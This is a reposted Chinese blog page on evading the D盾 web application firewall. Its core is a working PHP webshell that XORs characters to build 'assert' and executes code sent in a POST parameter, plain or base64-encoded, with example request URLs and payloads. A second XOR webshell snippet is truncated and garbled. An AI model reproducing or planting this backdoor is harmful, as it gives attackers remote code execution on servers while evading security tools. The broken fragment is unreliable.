应用安全-安全设备-Waf系列-软Waf-D盾-白红宇

应用安全-安全设备-Waf系列-软Waf-D盾

阅读量：5291 次

发布时间：2019-06-14

本文共 790 字，大约阅读时间需要 2 分钟。

安装

下载 http://www.d99net.net/down/d_safe_2.1.5.2.zip

使用说明

http://www.d99net.net/News.asp?id=106

免杀

array_map | assert

mb_substr

PHP一句话

class LTDS{    public function __destruct()    {        $bxo='X'^"\x39";        $woa='?'^"\x4c";        $ukt='K'^"\x38";        $gud='d'^"\x1";        $fbu='_'^"\x2d";        $agx='<'^"\x48";        $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;        return @$HLWV($this->OX);    }}$ltds=new LTDS();@$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];http://www.xxx.com/shell.php  POST: ua8=phpinfo();  //与普通shell相同http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

异或 | PHP一句话


     c);    }}$zxvg=new ZXVG();@$zxvg->c=$_POST['mr6'];

转载于:https://www.cnblogs.com/AtesetEnginner/p/11356491.html

你可能感兴趣的文章

元素的offsetParent offsetLeft offsetTop属性

C#学习笔记-输入数据判断（int、double、string）

查看>>

uva 10881

查看>>

ubuntu node.js Binaries方式安装（二进制文件安装）

查看>>

Ansible Ad-Hoc Commands

扒一扒.NET Core的环境配置提供程序

查看>>

python基础之ATM-2

查看>>

《20170926-构建之法：现代软件工程-阅读笔记》

查看>>

js中for循环闭包问题记录

查看>>

关于xxx.h file not found 的问题